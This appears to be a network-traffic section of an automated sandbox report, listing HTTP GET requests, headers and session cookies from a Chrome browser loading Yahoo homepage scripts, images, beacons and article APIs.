Source: global trafficHTTP traffic detected: GET /oa/consent.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/6x_jt5f8kHYIVKLC8RJf3Q--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/22383490-8588-11ef-bef3-ab14bc1f4efd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ybar/cerebro_min.js HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/tXAWAMh378MREDEIQWaIbQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/o1vbp9skMm8aYhU74pmr3g--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/16f9bfa0-8532-11ef-8f7e-7d7832959f0a.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__rapid-worker-1.2.js HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/9DG6AgnOJ2KdSpjKQ9t4uw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/21b5e300-8579-11ef-beaf-01118c908edd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ss/analytics-3.54.3.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/benji/benji-2.1.133.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_td_api/beacon/performance?ybar-init_0=0.5&ybar-mod-sidenav_0=1.5&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.6000000000058208&ybar-mod-assistjs_0=2.7999999999883585&ybar-mod-adaptivenav_0=0.20000000001164153&ybar-account-init_0=0.7000000000116415&ybar-mail-init_0=1&ybar-mod-navigation_0=9.5&ybar-mod-notification_0=0.1999999999825377&src=ybar&_rdn=814283&apptype=default&rid=1fkbtbdjgb12s&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /uc/sf/0.1.434/js/safe.min.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oa/consent.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__rapid-worker-1.2.js HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/benji/benji-2.1.133.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/yahooweb-network/loader.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uc/sf/0.1.434/js/safe.min.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=763792a6-0264-4c09-8fdc-ad4e3aa042d8,bd87c24a-8c34-4ec0-a681-3564c02d7778,d965fa24-e6a0-3c55-8290-0262978e7d08,7b47460a-662a-3fa6-bc8a-19c327c6fce9,3eb87d51-a7f4-304f-a28c-91350aafdafa,c800f6b2-23f8-4294-bb16-2fcd31dd05bf,a574dfca-1c8e-3952-b021-11a2a439b3b7,7e3e7364-c32b-3510-b0fe-64f202383852,9edb1ffc-4d2e-3ef7-ad6e-b96ef1549f9d,99ea0d11-6a27-33c8-b25a-19733882bdc0&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=53c53b29-181a-3610-abb6-7342d7ac1416,c0d99429-8a1e-3aa0-b598-bde24fb0d1b7,7fcfc158-f6e5-3b23-a4e2-e608b9d58220&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
